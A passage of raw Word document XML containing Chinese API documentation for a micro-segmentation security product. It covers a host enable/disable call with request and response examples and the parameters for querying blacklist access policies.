          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2516E4DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17636D69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1E991C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CE4B0E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C63266C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C5BFFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1BCC4988" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C690B77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E9C885" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57BE6C8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F578669" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开启:1 关闭：0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="072DA2A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC595A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "enabled":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430A9E87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097074E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A410C1F"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C62C7B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C7ACB10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DCD21CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="019641B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="662B9BEA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74949BF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="043001B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40BE78C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EA0ED0F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3209605C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CC28908" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0FC90E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1ECE5F72" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EB34385" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E3234E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2723ADC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E305C12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="50491F91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="204CCF6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="_Toc115166293"/>
      <w:bookmarkStart w:id="442" w:name="微隔离黑名单策略接口"/>
      <w:bookmarkEnd w:id="436"/>
      <w:bookmarkEnd w:id="440"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>微隔离黑名单策略接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
    </w:p>
    <w:p w14:paraId="3DBE4298" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="443" w:name="_Toc115166294"/>
      <w:bookmarkStart w:id="444" w:name="查询黑名单策略列表"/>
      <w:r>
        <w:t>查询黑名单策略列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w14:paraId="470D8B53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6BB47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/black-strategy/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="306B819D"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622"/>
        <w:gridCol w:w="1287"/>
        <w:gridCol w:w="1015"/>
        <w:gridCol w:w="6158"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="432F640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7583064" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D452352" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60690D6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39350C8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E1A85A1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C1D1C1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53CC4785" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE0A1FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AB35D98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="007DF6DF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A856387" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A481D91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BA31041" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B35984" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id集合</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3AF27902" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B747B49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EAA9B27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="320F014F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04B1FAE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="192EEC6F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03191174" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstGroupIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73BF4CCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF2677D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A78D923" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AC83DDE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38311433" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstTagIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DE0B301" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40401C55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="768BC317" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="089B7490" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EFA58E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05303A28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2633CD86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6061FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0572A8CF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ED36964" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcGroupIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F7EFA32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="655113F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7278200E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31AF2E77" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC2BA15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcTagIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B6989E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ADC2754" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ADD9523" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C3DD750" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28966166" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C235B8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637BED5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="244DEB05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="15C43B2C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
